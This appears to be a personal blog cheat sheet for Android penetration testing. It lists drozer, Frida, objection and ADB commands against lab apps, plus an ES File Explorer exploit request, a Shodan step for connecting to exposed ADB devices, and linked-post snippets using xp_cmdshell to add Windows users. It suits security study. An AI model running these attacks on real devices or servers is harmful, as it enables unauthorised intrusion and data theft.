Skip to main content

Android Pentest




Port Scan on Android

as many random ports can be open on Android devices, its always better to scan all the ports using  

https://github.com/RustScan/RustScan/releases
download the debian package
dpkg -i filename
rustscan -a 10.10.10.247

now scan all the open ports with nmap -sC -sV to run default script and for version scan.

Installing ADB

sudo apt-get install android-tools-adb

Setting up Drozer

#Installing drozer on docker docker pull withsecurelabs/drozer #Downlaod the drozer Agent and install it on android download from https://github.com/WithSecureLabs/drozer-agent/releases/tag/3.0.0 #Drag and drop on emulator or install via adb adb install drozer-agent.apk #on Windows setup port forwarding for emulator adb forward tcp:31415 tcp:31415 #Get a docker shell docker run --net host -it --entrypoint sh withsecurelabs/drozer #inside the container, start drozer drozer console connect --server host.docker.internal # Method - II #Find the IP Address in about #Connect the Android using IP address docker run --net host -it withsecurelabs/drozer console connect --server 10.10.10.10 #Get a shell docker run --net host -it --entrypoint sh withsecurelabs/drozer drozer console connect --server <phone IP address>

Drozer Commands

#list all functionality list #List packages run app.package.list #Filter for a specific app keyword run app.package.list -f diva #Basic info run app.package.info -a jakhar.aseem.diva #List About activates, broadcast, content providers and services run app.package.attacksurface jakhar.aseem.diva #If the App as Exported Activity #Get Activity info run app.activity.info -a jakhar.aseem.diva #View/Access the exported activity if Permission: null run app.activity.start --component jakhar.aseem.diva jakhar.aseem.diva.APICreds2Activity run app.activity.start --component app.package app.activy.path #You can open the exported actvity directly from adb shell adb shell am start -n jakhar.aseem.diva.APICreds2Activity #If the app has providers #Get info on content providers run app.provider.info -a jakhar.aseem.diva #Run Scanner to find provider urls #Take the content urls which are under "For Sure Accessible Content URIs" run scanner.provider.finduris -a jakhar.aseem.diva #Query a provider url run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/ #Look for Injection vulnerabilities in an app run scanner.provider.injection -a jakhar.aseem.diva #Automatically exploit SLQ Injection - print tables run scanner.provider.sqltables -a jakhar.aseem.diva

Static Analysis

#Decompile the application apktool d appication.apk #Decompile without resources, use when the app is too huge apktool d application.apk -r #Search for strings in all locations #Even lib directory can contain some useful source code an API key #Use Strings on .so/ELF files #smali directory contains the source code - but its not in readable format, need to use dex to jar converter

Locations to check for Secrets

- resources/res/values/strings.xml, xmls.xml, integers.xml, attrs.xml - find below strings - firebase_database_url - google_api_key - google_app_id
- google_crash_reporting_api_key
- google_storage_bucket - client_id - API - password - AWS - Secret - http:// or https:// - .db or .sqllite or SQL or better use jadx-gui from https://github.com/skylot/jadx/releases/tag/v1.5.0

In Android Manifest.xml keywords to Look for

- API Keys - Providers - Content Providers; find ones which are exported - SdkVersion - Permissions #Activites with export=true can be started/opened from adb shell by running the command - just add a / before .activityname am start b3nac.injuredandroid/.b25lActivity # Make sure there is no sensitive data in the activity where exported=true - exported="true" - Activities. - backup -- Application is saving some backup data when running - should be on the top - Debug

AWS Enumeration

use Cloud Enum tool - available on github

Firebase DB Enum

- see if you can find a firebase url in the source code, if yes try going to it and see what you can find there - dirb it and find any exposed content - find the DB on the apk Use https://github.com/Sambal0x/firebaseEnum git clone https://github.com/Sambal0x/firebaseEnum.git cd firebaseEnum python -m pip install -r requirements.txt python3 firebaseEunm.py -k APK_Name

Abusing ES File Explorer Vuln

Exploiting can be downloaded from here

or can use curl to abuse it


curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777

Installing and Setting up Frida & Objection

python -m pip install setuptools python -m pip install frida-tools python -m pip install objection add this path to env PATH - Update as required "C:\Users\name\AppData\Local\Android\Sdk\build-tools\34.0.0" #patch the apk with objection first, if that doenst work patch it with frida manually #A new apk is generated in the same directory with name.objection.apk #Drag and drop the new apk into android emulator, Uninstall the original apk and install the new patched apk. objection patchapk --source injuredAndroid.apk

Patching Manually using Frida

You can follow this tutorialtutorial #Decompile without resources, use when the app is too huge apktool d application.apk -r #Go to lib directory of the apk and go to appropriate architecture of the emulator APK_NAME/lib/x86_64/ go to Frida Releases and download the appropriate gadget frida-gadget-16.3.3-android-x86_64.so.xz #Rename the file to libfrida-gadget.so or frida-gadget.so (based on the libraries naming convention) and copy the file into APK_NAME/lib/x86_64/ #Paste the below code into any smali file which you know loads for sure - Example: MainActivity.smali under /APK_NAME/smali/COmpany/APK_NAME/ (Ex: injuredAndroid/smali/b3nac/injuredandroid/) and save it.
const-string v0, "frida-gadget" invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V

#Add the Internet permission to the manifest if it’s not there already, so that Frida gadget can open a socket. <uses-permission android:name="android.permission.INTERNET" /> #ReBuild the apk apktool b injuredAndroid -o inured_patched.apk apktool b DirectoryPath -o Output.apk #Sign the APK keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore custom.keystore -storepass password inured_patched.apk mykeyaliasname jarsigner -verify inured_patched.apk

# Installing zipalign

nano /etc/apt/sources.list #comment the kali apt source and add the below line deb http://ftp.de.debian.org/debian buster main sudo apt update sudo apt install zipalign zipalign 4 inured_patched.apk inured_final.apk #Drag and drop the final apk into emulator and start the apk #Start objection to run the apk objection explore #Disable ssl pinning android sslpinning disable

Dynamic Analysis with MobSF

#for Linux download MobSF and run setup.sh then run.sh #for Windows Download docker from https://docs.docker.com/desktop/install/windows-install/ #Setup MobSF docker pull opensecurity/mobile-security-framework-mobsf:latest #Run MobSF docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest #or add a new env variable Variable name: mobsf Variable Value: docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest from now on type on cmd to run mobsf on docker %mobsf%
#Access the application using creds mobsf/mobsf http://127.0.0.1:8000/login/ #Add below path to Environmental variables PATH C:\Users\Bhanu\AppData\Local\Android\Sdk\emulator

ADB Commands

ADB Cheatsheet is here

#Port forward a port from the Android device to ADB
sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local

#Connect to a device over wireless
adb tcpip 9090

#connect to the service
adb connect 127.0.0.1:5555

#list connected devices
adb devices

#get a shell from a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell


#get a shell
adb shell

#get root privs from a shell
su

#install an apk
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"

#Getting screenshots
adb shell screencap <path to save>

#Recording the screen
adb shell screenrecord <path to save>

#Downloading files
adb pull <source file path> <destination file path>

#Uploading files
adb push <source file path> <destination file path>

#Visiting websites
adb shell am start -a android.intent.action.VIEW -d <URL of the website>

#Getting system information
getprop

Commands inside ADB Shell

#List Available packages pm list packages # Find a specific package pm list packages | grep Name # Find the path of the package pm path full_packageName pm path b3nac.injuredandroid package:/data/app/b3nac.injuredandroid-1/base.apk # Download the apk back into the main host machine #exit out of the adb shell exit adb pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk #incase you have multiple emulators open adb -s emulator-5556 pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk # you can now open the apk for static analysis

Finding Devices on Shodan

android debug bridge
adb connect 100.100.100.100:5555

Get Remote Access of a device

apt install scrcpy
scrcpy

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in